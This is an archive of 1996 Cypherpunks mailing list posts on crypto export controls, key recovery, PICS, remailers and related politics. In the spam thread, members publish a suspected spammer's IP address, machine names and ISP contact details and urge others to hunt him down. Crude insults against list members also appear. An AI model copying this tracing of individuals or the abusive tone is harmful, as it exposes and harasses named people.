mailto:m5@tivoli.com    mailto:m101@io.com    http://www.io.com/~m101
^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sun, 15 Dec 1996 18:07:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: [No joke] The Feds may legally gas us
In-Reply-To: <3.0.32.19961214221317.00683ea0@netcom14.netcom.com>
Message-ID: <v03007800aeda5f274ca5@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:21 PM -0800 12/14/96, Lucky Green wrote:
>At 06:09 PM 12/14/96 +0000, The Deviant wrote:
>>True, but the point still stands -- They can't, legally.
>
>I am not certain that the chemical weapons prohibitions apply to a
>country's own civilians. IANAL.
>

I have no opinion on whether the government has the legal authority to
perform CBW experiments on its citizen-units, but clearly what the laws
authorize and what is done are two entirely different things.

Consider that two major, long-lasting, very damaging wars were fought by
U.S. troops--without the "Declaration of War" so prominently included in
the Constitution.

I refer of course to the Korean War and the Vietnam War, both of which were
treated by the U.S. government as "something else" ("police action,"
"recent unpleasantness," :-}, etc.). When the intent of the Framers can be
so skirted by calling a war something besides a war...well, I rather doubt
the CBQ experimenters would worry too much about some obscure law.

As to experiments on U.S. citizen-units, this seems much less likely than
before. First, there are lots of whistle-blowers, journalists, etc.
(including perhaps some who might use our remailers to let out details).
Second, there are now several dozen "captive nations" under the thrall of
the U.S., especiallly with the U.S. the only remaining superpower. In many
cases, their governments may take a bribe to allow experimentation on their
citizen-units.

--Tim May


Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David Lesher / hated by RBOC's in 5 states" <wb8foz@wauug.erols.com>
Date: Sun, 15 Dec 1996 15:28:11 -0800 (PST)
To: cypherpunks@toad.com (Cypherpunks)
Subject: PGP & Zimmerman on Tonight's CBS News
Message-ID: <199612152327.SAA02726@wauug.erols.com>
MIME-Version: 1.0
Content-Type: text/plain


I caught only part of a LONG (by network news standards) piece on
crypto with PRZ, Jimmy SuperFed Kellstrom and Scott Charney.

If CBS news is yet to air in your area, it is well worth your time
to see, and perhaps record. Phil came off very well.

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Sun, 15 Dec 1996 18:40:01 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: ITARs effects
Message-ID: <v02140b00aeda64c99d0a@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>Adam Shostack writes:
>
>: Peter D. Junger wrote:
>: |
>: | : This implies that putting something up for FTP == export. Holy
>: | : shit.
>: |
>: | That has always been the position of the Department of Defense Trade
>: | Controls with respect to the ITAR, the only difference is that now
>: | it is going to be in writing.
>:
>:       My understanding is that they choose not to continue
>: per^H^Hrosecuting Phil for putting the code up for FTP.  Thus, this is
>: a change.  Or did Phil not put the code up for FTP?
>
>Phil probably did not put up the code,

[snip]
> In my case the
>government's lawyer has made it quite clear that they would consider
>putting cryptographic software on a web site as a violation, and I
>don't think that for this purpose there is any distinction either in
>the government's mind or in reality between an FTP site and a web
>site.
>

These changes are all aimed at making it harder to make money from strong
crypto and therefore reduce its common availability worldwide. They do
little  to keep it from circulating worlwide, what ever its country of
origin as anonymous posting to a newsgroup is still straightforward.

Look for more shareware and commercial crypto source to circulate in
printed, rather than machine-readable, form to take advantage of freedom of
speech rules.

-- Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phillip M. Hallam-Baker" <hallam@ai.mit.edu>
Date: Sun, 15 Dec 1996 16:00:20 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: Re: Why PICS is the wrong approach
Message-ID: <01BBEABA.4237CB30@crecy.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain




Dale Thorn <dthorn@gte.net> wrote in article <58q40v$k22@life.ai.mit.edu>...
> Vladimir Z. Nuri wrote:

> If Firefly is an example of what PICS is or could become, the hell with
> PICS.  Firefly encourages and rewards group behavior and suppresses
> individuality.  Firefly would reward the discussion of the latest album
> by a Columbia or Capitol artist, and discourage discussion of material
> from independent (real independent) labels.  I know because I've been
> there and spent quite a bit of time trying to get a rating.

I think there are two issues here, Firefly and PICS. Confusing one
with the other is a bad thing. PICS is simply one way of applying labels
to content. Its sole reason for being was to head off the CDA. Now
that the judicial route has been taken I see little likelyhood that PICS
can succeed since either the supreme court will uphold the CDA
and we have the Singapore scenario or the CDA gets booted out 
and the matter is over.

If the US congress had wanted to do any good instead of making
itself look good then the voluntary approach of PICS with the
multiple rating schemes was the one most likely to work. I don't
think that it would stop 16 year olds from seeing pornography
but since children of that age are in most jurdisdictions permitted
by law to engage in sex on their own account it seems a bit bizare
to prohibit them from seeing pictures of sexual acts.

The problem with Firefly is that its a good(ish) idea baddly 
implemented. The much vaunted "agent" technology uses only a
very primitive nearest neighbour type match. There is no attempt
to draw structural inferences from the material, such as abstractions.
For example if I enjoy Dire Straights and Peter Gabriel then a
shop assistant would peg me as a late 70s rock fan and point
me towards the Fleetwood Mac and such. Firefly has 50% of
the structure needed to produce interesting matches but 
lacks the ability to make inferences. At least if it is the same
technology as Ringo, the previous generation.

This shortcomming of Ringo means that it is very slow work
training it. To get a useful measure it needs hundreds of data
points. When I visited I was faced with page after page of US
90s chart bands which I've not heard of and have no interest 
in. 

	Phill





  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Sun, 15 Dec 1996 13:46:26 -0800 (PST)
To: cypherpunks@toad.com
Subject: Certified primes
Message-ID: <199612151830.TAA23265@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


The only `culture' Timmy C[retin] Maytag possesses is that 
cultivated from his foreskin scrapings.

         /\ o-/\  Timmy C[retin] Maytag
        ///\|/\\\
       /   /|\   \




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: VAN HOUTEN <josh@MCI.net>
Date: Sun, 15 Dec 1996 20:09:47 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: read if have time (not important)
Message-ID: <01BBEACB.CC7E23A0@usr20-dialup3.mix1.Sacramento.mci.net>
MIME-Version: 1.0
Content-Type: text/plain


	Hi thanx for taking time out to read this note. I am doing a school paper on "Sex and Violence on the Internet". If you might be able to write me on your thoughts on the subject that would be very helpfull. Sorry if I took up your time. So you do not have to E-mail to the whole list my address is:
josh@mci.net


			thank you so much.......




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Sun, 15 Dec 1996 21:19:37 -0800 (PST)
To: cypherpunks@toad.com
Subject: Van Eck articles
Message-ID: <3.0.32.19961215211852.00e8ff4c@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


Looking for:

"Electromagnetic Radiation from Video Display Units: An Eavesdropping
Risk?" by Wim Van Eck, published in "Computers & Security,"  1985, Vol 4

and

"Protective Measures Against Compromising Electromagnetic Radiation Emitted
by Video Display Terminals" by Professor Erhard Moller, Aachen University,
1990 (no source citation)

Haven't found an electronic version of either of these yet, and will visit
the good old "paper-based" library next week if no pointers show up.

Thanks in advance...

Joel




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael H. Warfield" <mhw@wittsend.com>
Date: Sun, 15 Dec 1996 19:50:02 -0800 (PST)
To: zerofaith@mail.geocities.com (Psionic Damage)
Subject: Re: sorry for the spam!
In-Reply-To: <199612160157.RAA24380@geocities.com>
Message-ID: <m0vZU3s-0000whC@wittsend.com>
MIME-Version: 1.0
Content-Type: text/plain


Psionic Damage enscribed thusly:

> I apologize 4 the spam, not my doing, Haven't figured out who waz
> responsible, but I will understand if I amd kicked off this list.
> Once again, I am sorry.

	The individual is a little shit operating a windows system on
IP address 206.129.116.108 as of Sunday evening.  While the messages
where poping up on cypherpunks, one of the Received-By headers was
indicating his IP address.  I was able to confirm his presence on the
network and determine it to be a windows system operating with the workstation
name of "MARLAEST" and a workgroup name of "ESTES ADVENTURE".  He's not
operating a windows messaging pop-up or I would have sent him an appropriate
message of appreciation.  Since it IS a windows system (and not running
sendmail) I think it is safe to assume that he IS the end point of this
bullshit.

	206.129.116.108 is in a block assigned to Premier1 Internet,
Coordinator Michael Heuerman, mikheu@PREMIER1.NET (360-793-3658), who is also
getting a copy of this...

	This individual is still on line as of 22:43 EDT 12/15/96

	Can someone kindly track this little asshole down and dump his sorry
ass in the nearest toxic waste dump?

> ----------------------------------------------------------------------------
> ----------------------------------------------------------------------------
> ----------------------
> Zer0 Faith Inc. H/P/A/V/C UNDER-WORLD
> www.geocities.com/SiliconValley/Heights/2608
> 
> MEMBERZ:
> 
> GATEMASTER, VIRIZZ, KRASH, EVIL TWIN, PHONEHAZORD, PSIONIC DAMAGE,
> MANTIKORE, ERADIKATOR, PSYCHODROME, SONIK, kOBRA, & KRYPTIK!
> 
> EMAIL:zerofaith@nlights.net (headquarterz) hakker1@hotmail.com (Delious's
> Haus!) hackerz@juno.com (The Gatemaster'z palace) zerofaith@geocities.com
> (delivery/help/requests/suggestions)

	Mike
-- 
 Michael H. Warfield    |  (770) 985-6132   |  mhw@WittsEnd.com
  (The Mad Wizard)      |  (770) 925-8248   |  http://www.wittsend.com/mhw/
  NIC whois:  MHW9      |  An optimist believes we live in the best of all
 PGP Key: 0xDF1DD471    |  possible worlds.  A pessimist is sure of it!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: msprague@ridgecrest.ca.us
Date: Sun, 15 Dec 1996 23:18:36 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: sorry for the spam!
Message-ID: <199612160717.XAA19637@owens.ridgecrest.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


as of Sunday 23:00PST 12/15 he was using a mailto IP of 206.129.116.5 and
http's to 192.41.31.20/thatguy/upyours.zip


>Psionic Damage enscribed thusly:
>
>> I apologize 4 the spam, not my doing, Haven't figured out who waz
>> responsible, but I will understand if I amd kicked off this list.
>> Once again, I am sorry.
>
>	The individual is a little shit operating a windows system on
>IP address 206.129.116.108 as of Sunday evening.  While the messages
>where poping up on cypherpunks, one of the Received-By headers was
>indicating his IP address.  I was able to confirm his presence on the
>network and determine it to be a windows system operating with the workstation
>name of "MARLAEST" and a workgroup name of "ESTES ADVENTURE".  He's not
>operating a windows messaging pop-up or I would have sent him an appropriate
>message of appreciation.  Since it IS a windows system (and not running
>sendmail) I think it is safe to assume that he IS the end point of this
>bullshit.
>
>	206.129.116.108 is in a block assigned to Premier1 Internet,
>Coordinator Michael Heuerman, mikheu@PREMIER1.NET (360-793-3658), who is also
>getting a copy of this...
>
>	This individual is still on line as of 22:43 EDT 12/15/96
>
>	Can someone kindly track this little asshole down and dump his sorry
>ass in the nearest toxic waste dump?
>
>> ----------------------------------------------------------------------------
>> ----------------------------------------------------------------------------
>> ----------------------
>> Zer0 Faith Inc. H/P/A/V/C UNDER-WORLD
>> www.geocities.com/SiliconValley/Heights/2608
>> 
>> MEMBERZ:
>> 
>> GATEMASTER, VIRIZZ, KRASH, EVIL TWIN, PHONEHAZORD, PSIONIC DAMAGE,
>> MANTIKORE, ERADIKATOR, PSYCHODROME, SONIK, kOBRA, & KRYPTIK!
>> 
>> EMAIL:zerofaith@nlights.net (headquarterz) hakker1@hotmail.com (Delious's
>> Haus!) hackerz@juno.com (The Gatemaster'z palace) zerofaith@geocities.com
>> (delivery/help/requests/suggestions)
>
>	Mike
>-- 
> Michael H. Warfield    |  (770) 985-6132   |  mhw@WittsEnd.com
>  (The Mad Wizard)      |  (770) 925-8248   |  http://www.wittsend.com/mhw/
>  NIC whois:  MHW9      |  An optimist believes we live in the best of all
> PGP Key: 0xDF1DD471    |  possible worlds.  A pessimist is sure of it!
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamie@comet.net (jamie dyer)
Date: Sun, 15 Dec 1996 20:23:44 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re:chek it out
Message-ID: <Pine.BSF.3.95.961215232247.6191A-100000@atlas.comet.net>
MIME-Version: 1.0
Content-Type: text/plain


Thank god for procmail.


jamie
------------------------------------------------------------------------------
jamie@comet.net |          Comet.Net		|  Send empty message 
		|     Charlottesville, Va.  	|  to pgpkey@comet.net 
		|        (804)295-2407		|  for pgp public key.
	        |     http://www.comet.net	|
"When buying and selling are controlled by legislation, the first things
to be bought and sold are legislators"  -P.J. O'Rourke. 
------------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Sun, 15 Dec 1996 23:38:02 -0800 (PST)
To: Joel McNamara <joelm@eskimo.com>
Subject: Re: Van Eck articles
Message-ID: <v02140b00aedaa516e79e@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>Looking for:
>
>"Electromagnetic Radiation from Video Display Units: An Eavesdropping
>Risk?" by Wim Van Eck, published in "Computers & Security,"  1985, Vol 4

I OCR'd this and have it as either an 895K Word 5.1a (Mac) or 705K Acrobat
document.  I'll email a copy to anyone that's interested.

>
>and
>
>"Protective Measures Against Compromising Electromagnetic Radiation Emitted
>by Video Display Terminals" by Professor Erhard Moller, Aachen University,
>1990 (no source citation)

I seem to have misplaced this document.  However, I don't recall OCR'r it.

-- Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John Poole" <jfpoole@undergrad.math.uwaterloo.ca>
Date: Sun, 15 Dec 1996 20:38:10 -0800 (PST)
To: "Dale Thorn" <trei@process.com>
Subject: Re: ASM vs portable code [WAS: Re: Java DES breaker?]
Message-ID: <199612160438.XAA11664@mag1.magmacom.com>
MIME-Version: 1.0
Content-Type: text/plain


Dale Thorn wrote:
> I remember sitting down with some ASM programmers in the mid 1980's
> (using x86 PCs), and at that time, looking at the Codeview tracings,
> it occurred to me that ASM would nearly always run 2x faster than 'C',
> something that is inherent in the processes.

This discussion sounds similar to the "C vs. Assembler" thread that's been
raging on comp.lang.c for the past couple of months. The general consensus
seems to be that on an x86 processor, using C for most of your program and
using assembler sparingly is the best way to go. Plus, most compilers will
produce code that runs about 1.2 - 1.5 times slower than your average
assembler code. You mileage, of course, will vary.

-----------------------------------------------
John Poole, 2A AM/CS, University of Waterloo
http://www.undergrad.math.uwaterloo.ca/~jfpoole
"I've gone too far, for too little."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rcgraves@ix.netcom.com
Date: Sun, 15 Dec 1996 23:51:51 -0800 (PST)
To: cypherpunks@toad.com
Subject: Carto international money-laundering/embezzlement case
Message-ID: <199612160751.XAA03800@dfw-ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Dale Thorn <dthorn@gte.net> wrote:
> 
> Further (and at the risk of being identified with a particular
> political slant, which I don't have), this "newspaper" is actively 
> collaborating with other international interests to put the nail in 
> Free Speech, via the Holocaust issue.  Carto of Liberty Lobby fame 

Apologies for replying to a crank whom most people are already ignoring, 
but I've got lots of material relating to the case of Legion v. Carto, 
which Dale summarizes quite wrongly, at 
http://www-leland.stanford.edu/~llurch/potw2/legion/

Cypherpunk relevance: HUGE. Money laundering, reputation control, data and 
tax havens, libertarian and Nazi fantasies, criminal cults, and a dog named 
Fido. Judge Maino:

|     I believe that I could appoint a platoon of lawyers and accountants 
| to look into this case and I would still not be much closer to answering 
| the following questions than I am today. The reason the truth will never
| be fully known is because the parties, all highly intelligent and 
| capable, seem to have spent their lives forming organizations and then 
| transferring money between these organizations to avoid problems with
| their opponents or the government. A good example of this is Ms. Farrel.
| She gives up U.S. Citizenship, takes Columbian citizenship, and resides 
| in Switzerland to avoid taxes. She keeps her assets in the U.S., England,
| Switzerland, Germany, Singapore and Japan. She sets up a Liberian 
| corporation, Neca, to take charge of her assets for the Legion which is a
| Texas corporation doing business in California. 

Far from Dale's preoccupation with "international joo interests," it's a 
case of two neo-Nazi groups suing each other over the mismanagement of an 
inheritance. Stir in a little CoS interest (they want to cover up 
Marcellus's involvement with Holocaust denial and to associate recent legal 
actions against the cult in Germany with the Holocaust), and it's a 
veritable cornucopia of fruitcakes bashing each other, all over money for 
which no clear accounting can be made because it was always kept at least 
partly underground.

Would that we could all do so well.

The judge's letter on how he saw the witnesses is *very* entertaining.
It's legion-vs-carto-letter.html in the above directory, but by all means, 
read it all. If you have soft copies of anything The Spotlight or any other 
pro-Carto rag has to say for itself, I'd be delighted to archive them, too.

- -rich


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMrT+85NcNyVVy0jxAQHhewIArARpR1DeaX+dKeyB+nAbL0otSEbtfO+I
kRrfJMG6rR9TrMXPcRpj/ViWXvqEPOMNJoUXjv3xGfT6MoXcsuPFhQ==
=f60U
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bovine Remailer <haystack@cow.net>
Date: Sun, 15 Dec 1996 21:29:52 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <9612160514.AA12168@cow.net>
MIME-Version: 1.0
Content-Type: text/plain


>admit that HP (for example) is the best, reliability-wise, yet I have
>purchased quite a few of their computers and major peripherals over the
>past 20 years, and I have experienced an approximate 40% (!) defective
>rate during the one-year warranty period, more than 30% falling within
>the first three months.

Dale, perhaps it's time for you to seek out a new career.
Check that LA "Not a real paper" Times for things like 
"car wash assistant needed" and good luck. 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Sun, 15 Dec 1996 22:27:57 -0800 (PST)
To: Psionic Damage <zerofaith@mail.geocities.com>
Subject: Re: sorry for the spam!
In-Reply-To: <199612160157.RAA24380@geocities.com>
Message-ID: <Pine.BSF.3.91.961216001606.27403D-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




Sorry for the SIN attack. Not my doing. The Ping of Death, either. Nope.

-r.w.

On Sun, 15 Dec 1996, Psionic Damage wrote:

> I apologize 4 the spam, not my doing, Haven't figured out who waz
> responsible, but I will understand if I amd kicked off this list.
> Once again, I am sorry.
> ----------------------------------------------------------------------------
> ----------------------------------------------------------------------------
> ----------------------
> Zer0 Faith Inc. H/P/A/V/C UNDER-WORLD
> www.geocities.com/SiliconValley/Heights/2608
> 
> MEMBERZ:
> 
> GATEMASTER, VIRIZZ, KRASH, EVIL TWIN, PHONEHAZORD, PSIONIC DAMAGE,
> MANTIKORE, ERADIKATOR, PSYCHODROME, SONIK, kOBRA, & KRYPTIK!
> 
> EMAIL:zerofaith@nlights.net (headquarterz) hakker1@hotmail.com (Delious's
> Haus!) hackerz@juno.com (The Gatemaster'z palace) zerofaith@geocities.com
> (delivery/help/requests/suggestions)
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Scanlon <tfs@adsl-122.cais.com>
Date: Sun, 15 Dec 1996 21:27:50 -0800 (PST)
To: stewarts@ix.netcom.com
Subject: Re: Gov't Clarifes Position-Surprise!
In-Reply-To: <1.5.4.32.19961215201616.003aa660@popd.ix.netcom.com>
Message-ID: <9612160526.AA21666@adsl-122.cais.com>
MIME-Version: 1.0
Content-Type: text/plain


stewarts@ix.netcom.com said:
|----Begin Forwarded Message----
|>From EPIC http://www.epic.org/crypto/export_controls/draft_regs_12_96.html 
|
|**Commerce Department Prepares Draft Encryption Export Regulations**
|
|December 11, 1996
|
[snip]
|The regulations would amend the Export Administration Regulations (EAR) 
|by imposing national security and foreign policy controls ("EI" for 
|Encryption Items) on certain information security systems and equipment,      
|cryptographic devices (including recoverable encryption software) and 
|related technology.  

Basicly everything. Presuming or believing there are things that are exempt
from these regulations is foolish. They're like a rude salesman with a foot
in the door, they are not used to being told "no", nor will they stop at a simple
"no". 

|
|For the first time, the Administration makes clear what it means by "Key 
|Recovery Encryption." The regulations state that: 
|
|For purposes of this rule, "recovery encryption products" refer to 
|encryption products (including software) which allow law enforcement 
|officials to obtain under proper legal authority and without           
|the cooperation or knowledge of the user, the plaintext of encrypted data 
|and communications.

This is the important part.  US Law Enforcement, specificly the FBI, have a
serious desire to obliterate privacy. Reading of documents profiling what
they desire spans this, and the only "check" they speak of or envision
is that of a warrant or other legal means to do so. I say "other legal means"
because they'll probably start chipping away & narrowly interpreting the
privacy act as soon as they achieve this goal. As it stands, it's entirely too
easy for them to get basic search warrants, and I believe they want to do
a technology conversion on that to be able to engage in digital wiretapping
& searches. I think they believe computers, properly governed, can make their
jobs easier. In this case laziness is the root of all evil. 

The sick thing is the closest I can come to governmental analogues to what
they propose are organizations like the East German Stasi, Stalin's secret police,
and other similar police organizations who effectively utilize technology to curtail
liberty. In todays society, they don't have to make people "disappeared", but rather
to just do it to people's technology. The FBI does this now as things stand. Punitive
seizure of computers without indictments or charges are relatively commonplace. I
believe the whole situation is going to get worse as they continue to chip away at
crypto.  They certainly are NOT acting as protectors of liberty in the US in any way
with these proposals.

|
|This is an exact description of the original Clipper encryption proposal 
|that was widely opposed by Internet users and industry when it was 
|announced in 1993. 

Clipper 3.11 shares all the same goals, and in fact, as time has passed, while
they try to chip away at privacy, it has become even more apparent that the
goals they want are regressive in terms of what we in the US consider basic
freedoms, and that they're Orwellian and frightening when you think about the
long haul.  Expect a 'Clipper 95' if this subsides or gets shot down. These people
are in it for the long haul. Snooping has always been the lazy mans way to engage
in law enforcement, and is obviously the most comprehensive choice. Privacy is
very inconvenient to the "needs" (ever notice they never have 'wants'? and always
have some horrific example to dredge up, no matter how fluky or 1-in-a-million, to
justify what they "need"? Funny how that works out.) of law enforcement. 

Expect some form of cooperation with EC governments if this stuff goes through.
The recent posting to cypherpunks about the "radikal" raid in the Netherlands is
probably a good foreshadowing of this. If you have not seen the article, and want to,
I will be happy to remail it.


Tim Scanlon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dagmar the Surreal <dagmar@edge.net>
Date: Mon, 16 Dec 1996 00:10:49 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: sorry for the spam!
Message-ID: <3.0.32.19961216021235.00725744@edge.net>
MIME-Version: 1.0
Content-Type: text/enriched

At 10:49 PM 12/15/96 -0500, "Michael H. Warfield" <mhw@wittsend.com> wrote:
>Psionic Damage enscribed thusly:
>
>> I apologize 4 the spam, not my doing, Haven't figured out who waz
>> responsible, but I will understand if I amd kicked off this list.
>> Once again, I am sorry.
>
>	The individual is a little shit operating a windows system on
>IP address 206.129.116.108 as of Sunday evening.  While the messages
>where poping up on cypherpunks, one of the Received-By headers was
>indicating his IP address.  I was able to confirm his presence on the
>network and determine it to be a windows system operating with the workstation
>name of "MARLAEST" and a workgroup name of "ESTES ADVENTURE".  He's not
>operating a windows messaging pop-up or I would have sent him an appropriate
>message of appreciation.  Since it IS a windows system (and not running
>sendmail) I think it is safe to assume that he IS the end point of this
>bullshit.
>
>	206.129.116.108 is in a block assigned to Premier1 Internet,
>Coordinator Michael Heuerman, mikheu@PREMIER1.NET (360-793-3658), who is also
>getting a copy of this...

Aside from that, the traceroute of that IP address just happens to take it to nlights.net, which is apparently somehow affiliated with AOL, but in any case, the WWW pages the spam points to just HAPPEN to list down at the bottom an email address to contact the author which isn't a remailing service like geocities or hotmail.  It's zerofaith@nlights.net.
^^^^^^^^^^^


Normally I don't like to call people liars in public, but I think that if Mr. Faith doesn't know who's responsible for the spam, then I'm the Queen of @#$%!
England.
----------
Dagmar the Surreal, now with 50% less sodium!
Coming in 1997--Surreal III, http://edge.edge.net/~dagmar
(...now where did I leave that darn salt?)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mf@MediaFilter.org (MediaFilter)
Date: Mon, 16 Dec 1996 01:32:54 -0800 (PST)
To: eon@black.hole
Subject: name.space. call for content
Message-ID: <1361416246-7199575@MediaFilter.org>
MIME-Version: 1.0
Content-Type: text/plain


Hello All,

The black.hole in the net project is now online
and functioning.

Please add your project to the "switchboard" via the
links generator accessable from the black.hole page:

http://black.hole
(or http://blackhole.autono.net)


The page is beginning to get lots of hits, so
now's the time to put up your stuff!

Best wishes,

Paul Garrin






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: IIR GmbH & Co <100567.540@compuserve.com>
Date: Mon, 16 Dec 1996 00:23:55 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: xxx
Message-ID: <961216082117_100567.540_GHW109-1@CompuServe.COM>
MIME-Version: 1.0
Content-Type: text/plain


 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 16 Dec 1996 06:53:11 -0800 (PST)
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199612161450.GAA02397@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@miron.vip.best.com> cpunk pgp special";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'nymrod'} = '<nymrod@nym.jpunix.com> alpha pgp';
$remailer{"lead"} = "<mix@zifi.genetics.utah.edu> cpunk mix pgp hash latent cut ek";
$remailer{"exon"} = "<remailer@remailer.nl.com> cpunk pgp hash latent cut ek";
$remailer{"haystack"} = "<haystack@holy.cow.net> cpunk mix pgp hash latent cut ek";
$remailer{"lucifer"} = "<lucifer@dhp.com> cpunk mix pgp hash latent cut ek";
$remailer{"jam"} = "<remailer@cypherpunks.ca> cpunk mix pgp hash latent cut ek";
$remailer{"winsock"} = "<winsock@rigel.cyberpass.net> cpunk pgp pgponly hash cut ksub reord";
$remailer{'nym'} = '<config@nym.alias.net> newnym pgp';
$remailer{"balls"} = "<remailer@huge.cajones.com> cpunk pgp hash latent cut ek";
$remailer{"squirrel"} = "<mix@squirrel.owl.de> cpunk mix pgp pgponly hash latent cut ek";
$remailer{"middle"} = "<middleman@jpunix.com> cpunk mix pgp hash middle latent cut ek reord ?";
$remailer{'cyber'} = '<alias@alias.cyberpass.net> alpha pgp';
$remailer{"dustbin"} = "<dustman@athensnet.com> cpunk pgp hash latent cut ek mix reord middle ?";
$remailer{'weasel'} = '<config@weasel.owl.de> newnym pgp';
$remailer{"death"} = "<x@deathsdoor.com> cpunk pgp hash latent post";
$remailer{"reno"} = "<middleman@cyberpass.net> cpunk mix pgp hash middle latent cut ek reord ?";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.
remailer@crynwr.com is _not_ a remailer.

There is no remailer at relay.com.

Groups of remailers sharing a machine or operator:
(cyber mix)
(weasel squirrel)

The alpha and nymrod nymservers are down due to abuse. However, you
can use the nym or weasel (newnym style) nymservers.

The cyber nymserver is quite reliable for outgoing mail (which is
what's measured here), but is exhibiting serious reliability problems
for incoming mail.

The squirrel and winsock remailers accept PGP encrypted mail only.

403 Permission denied errors have been caused by a flaky disk on the
Berkeley WWW server. This seems to be fixed now.

The penet remailer is closed.

Last update: Mon 16 Dec 96 6:49:25 PST
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
jam      remailer@cypherpunks.ca          ************    14:59  99.98%
lead     mix@zifi.genetics.utah.edu       -++-+++*++++    41:38  99.98%
cyber    alias@alias.cyberpass.net        +*+******+**    32:02  99.96%
lucifer  lucifer@dhp.com                  ++++++++++++    34:51  99.93%
middle   middleman@jpunix.com             ------+----+  2:57:46  99.90%
reno     middleman@cyberpass.net          ------------  2:57:37  99.88%
haystack haystack@holy.cow.net            *#**+  *-++*    11:55  99.58%
exon     remailer@remailer.nl.com         +########* *     2:36  99.51%
replay   remailer@replay.com              -- -+**+*+-     32:21  99.43%
squirrel mix@squirrel.owl.de              ++++ ++++++   1:18:02  99.22%
weasel   config@weasel.owl.de             ++-+-++++ +   1:19:04  99.08%
winsock  winsock@rigel.cyberpass.net      ------ -..-   7:21:13  98.40%
dustbin  dustman@athensnet.com            -+++++ ++ .+  3:00:38  98.13%
